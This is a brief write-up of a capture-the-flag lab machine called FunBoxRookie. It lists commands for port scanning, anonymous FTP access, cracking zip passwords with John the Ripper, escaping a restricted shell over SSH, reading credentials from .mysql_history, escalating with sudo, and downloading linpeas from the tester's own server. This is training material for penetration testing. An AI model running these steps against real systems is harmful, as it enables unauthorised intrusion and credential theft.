FunBoxRookie
Last updated
Was this helpful?
Last updated
Was this helpful?
IP : 192.168.84.107
nmap 192.168.84.107 -p- -sV -A
FTP is allowing anonymous login. Downloaded all zip files.
Port 80 seems to be a dead end.
Found that each zip files was password protected.
Ran zip2john *.zip > zipfile.hash to get a hash for each zip file.
Ran John the Ripper against zipfile.hash
john zipfile.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Unable to connect via SSH with Cathrine's account.
Connected via SSH with Tom
ssh tom@192.168.84.107 -i id_rsa_tom
``Found local.txt flag in Tom's home folder.
Rbash restricting commands
Got stuck at Priv Esc - Must get better at Priv Esc. Had to get hint to read mysql_history.
Files in Tom's home directory
Submitted hash in local.txt
Read all files starting with .
cat .*
Found that there is a SQL entry with Tom's credentials in .mysql_history.
Found that su is stickied.
sudo su
Also logged back in with SSH to the restricted shell to test the at sticky privilege escalation.
Found restricted Shell Bypass
ssh tom@192.168.84.107 -i id_rsa_tom -t "bash --noprofile"
Source :
Started python http server and grabbed Linpeas.
curl http://192.168.49.84:8000/linpeas.sh -o linpeas.sh
Changed linpeas.sh perms
chmod 777 linpeas.sh
Linpeas found the initial stickied binaries but ran for good measure
find / -perm -u=s -type f 2>/dev/null
Source :
\
